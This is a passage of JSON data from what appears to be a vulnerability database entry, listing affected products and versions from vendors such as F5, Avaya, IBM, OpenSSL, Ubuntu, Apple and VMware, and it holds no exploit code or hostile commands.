"scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": "ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": 